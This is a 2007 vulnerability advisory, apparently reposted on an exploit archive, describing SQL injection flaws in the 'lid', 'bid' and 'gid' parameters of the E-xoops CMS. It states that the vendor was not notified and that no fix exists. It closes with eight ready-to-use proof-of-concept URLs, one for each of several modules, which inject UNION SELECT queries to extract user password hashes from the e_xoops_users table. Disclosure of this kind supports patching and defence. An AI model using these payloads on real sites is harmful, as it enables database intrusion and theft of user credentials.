Home / os / solaris

exoops-sql.txt

Posted on 11 December 2007

############################################ E-xoops multiple variable/scripts SQL injection vendor url: http://www.e-xoops.com Advisore: http://lostmon.blogspot.com/2007/12/ e-xoops-multiple-variablescripts-sql.html vendor notify:NO exploits available: YES ############################################ E-xoops is content-community management system written in PHP-MySQL. E-xoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the script not properly sanitizing user-supplied input to the 'lid','bid' and 'gid' variable, multiple script.This may allow an attacker to inject or manipulate SQL queries in the backend database. ################# Versions: ################# E-Xoops 1.08 E-Xoops 1.05 Rev3 E-Xoops 1.05 Rev2 E-Xoops 1.05 Rev1 and possible early versions. ################# Solution: ################# no solution available at this time Try to edit the source code. you can look this post in my group to patch E-xoops ,because the source code is veeeery similar to bcoos cms http://groups.google.com/group/lostmon/ browse_thread/thread/59f3b836fad5b009 and here you have a src reference for E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html ################# Timeline: ################# Discovered:25-11-2007 vendor notify:-------- vendor response:------- disclosure:09-12-2007 ################# SQL injections: ################# http://localhost/e-xoops/modules/mylinks/ ratelink.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/adresses/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/mydownloads/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/mysections/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/myalbum/ ratephoto.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/banners/ click.php?bid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/arcade/ index.php?act=show_stats&gid=-1%20UNION% 20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/arcade/index.php? act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM %20e_xoops_users%20LIMIT%201 ####################

 

TOP